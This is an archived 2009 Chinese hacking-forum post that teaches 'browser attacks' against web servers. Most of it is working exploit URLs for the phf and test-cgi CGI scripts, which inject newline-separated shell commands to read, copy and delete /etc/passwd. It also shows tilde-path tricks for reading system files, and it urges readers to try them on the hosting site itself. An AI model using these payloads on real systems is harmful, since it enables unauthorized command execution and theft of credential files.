【3.A.S.T】网络安全爱好者's Archiver

黑客学习

虚竹 发表于 2009-1-24 17:33

浏览器攻击

浏览器攻击
浏览器攻击

在本章我将讲述一些利用浏览器来进行攻击的方法
1。大家都知道了phf攻击了,phf是cgi script,很多站点都有这个大漏洞啦,使用
[url=http://thegnome.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd]http://thegnome.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd[/url]指令可以拿到那个站点的passwd.但还有些更好的执行方法呦如:
[url=http://thegnome.com/cgi-bin/phf?%0aid&Qalias=&Qname=haqr&Qemail=&Qnickna]http://thegnome.com/cgi-bin/phf? ... Qemail=&Qnickna[/url]

me=&Qoffice_phone=
[url=http://thegnome.com/cgi-bin/phf?%0als%20-la%20%7Esomeuser&Qalias=&Qname=]http://thegnome.com/cgi-bin/phf? ... ;Qalias=&Qname=[/url]
haqr&Qemail=&Qnickname=&Qoffice_phone=
[url=http://thegnome.com/cgi-bin/phf?%0acp%20/etc/passwd%20%7Esomeuser/passwd]http://thegnome.com/cgi-bin/phf? ... 0%7Esomeuser/passwd[/url]
%0A&Qalias=&Qname=haqr&Qemail=&Qnickname=&Qoffice_phone=
[url=http://thegnome.com/~someuser/passwd]http://thegnome.com/~someuser/passwd[/url]
[url=http://thegnome.com/cgi-bin/phf?%0arm%20%7Esomeuser/passwd&Qalias=&Qname]http://thegnome.com/cgi-bin/phf? ... p;Qalias=&Qname[/url]

=haqr&Qemail=&Qnickname=&Qoffice_phone=
上面执行的命令是
id
ls -la ~someuser
cp /etc/passwd ~someuser/passwd
rm ~someuser/passwd

2。有关test攻击
[url=http://thegnome.com/cgi-bin/test-cgi?]http://thegnome.com/cgi-bin/test-cgi?[/url]whatever
服务器会应答,本服务器的一些情况如:
CGI/1.0 test script report:

argc is 0. argv is .

SERVER_SOFTWARE = NCSA/1.4B
SERVER_NAME = thegnome.com
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/1.0

SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT = text/plain, application/x-html, application/html,
text/html, text/x-html
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /cgi-bin/test-cgi
QUERY_STRING = whatever
REMOTE_HOST = fifth.column.gov
REMOTE_ADDR = 200.200.200.200
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH =

好吧,让我们来点赶兴趣的
[url=http://thegnome.com/cgi-bin/test-cgi?]http://thegnome.com/cgi-bin/test-cgi?[/url]help&0a/bin/cat%20/etc/passwd

3。~的应用
~主要是用在很多的个人主页上的快捷目录的方法,如果我们使用这样的~
[url=http://thegnome.com/~root]http://thegnome.com/~root[/url]
[url=http://thegnome.com/~root/etc/passwd]http://thegnome.com/~root/etc/passwd[/url]
不是在任何平台上都通过呦,在BSD Apache上曾经成功过,当然还可以试试~bin ,~etc,~uucp.....
看到这个站点了吗,本站所在的这个站点就是用这种形式的,如果我们打入 本站所在的web地址/~bin
出现了什么,你看到了吗?然后...............注意请不要破坏

页: [1]

Powered by Discuz! Archiver 7.2  © 2001-2009 Comsenz Inc.